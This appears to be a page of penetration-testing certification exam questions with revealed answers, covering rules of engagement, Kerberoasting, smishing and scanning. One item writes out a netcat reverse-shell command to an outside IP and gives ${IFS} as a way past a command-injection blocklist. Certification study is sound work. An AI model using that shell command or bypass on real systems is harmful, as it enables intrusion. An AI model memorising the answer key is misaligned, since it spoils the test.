Which of the following would most likely be a function of the rules of engagement?

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?A . Testing windowB . Terms of serviceC . Authorization letterD . Shared responsibilitiesView AnswerAnswer: A Explanation: The rules of engagement define the...

February 12, 2025 No Comments READ MORE +

Which of the following technical controls should the tester recommend to reduce the risk of compromise?

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise? A . Multifactor authenticationB . Patch managementC . System hardeningD . Network segmentationView AnswerAnswer: C Explanation:...

February 8, 2025 No Comments READ MORE +

Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?A . SmishingB . ImpersonationC . TailgatingD . WhalingView AnswerAnswer: A...

February 6, 2025 No Comments READ MORE +

Which of the following attacks requires this information as a prerequisite to proceed?

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?A . Golden TicketB . KerberoastingC . DCShadowD . LSASS dumpingView AnswerAnswer: B Explanation: Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts...

February 5, 2025 No Comments READ MORE +

Which of the following tasks should the penetration tester do first?

A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very concerned about disclosure of information. Which of the following tasks should the penetration tester do first?A . Set up Drozer...

February 4, 2025 No Comments READ MORE +

4 if [ $?

A penetration tester wants to use the following Bash script to identify active servers on a network: 1 network_addr="192.168.1" 2 for h in {1..254}; do 3 ping -c 1 -W 1 $network_addr.$h > /dev/null 4 if [ $? -eq 0 ]; then 5 echo "Host $h is up" 6 else...

February 2, 2025 No Comments READ MORE +

Which of the following actions should the tester take to get the scans to work properly?

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output: 200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0 200; GET /login.aspx HTTP/1.1...

January 29, 2025 No Comments READ MORE +

Which of the following describes the information the junior tester will receive from the Hunter.io tool?

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?A . A collection of email addresses for the target domain that is...

January 29, 2025 No Comments READ MORE +

Which of the following would most likely bypass the filtered space character?

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command: nc -e /bin/sh 10.10.10.16 4444 Which of the following would most likely bypass the filtered space character?A . ${IFS}B . %0aC . + *D . %20View...

January 29, 2025 No Comments READ MORE +

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Which of the following describes the process of determining why a vulnerability scanner is not providing results?A . Root cause analysisB . Secure distributionC . Peer reviewD . Goal reprioritizationView AnswerAnswer: A Explanation: Root cause analysis involves identifying the underlying reasons why a problem is occurring. In the context of...

January 28, 2025 No Comments READ MORE +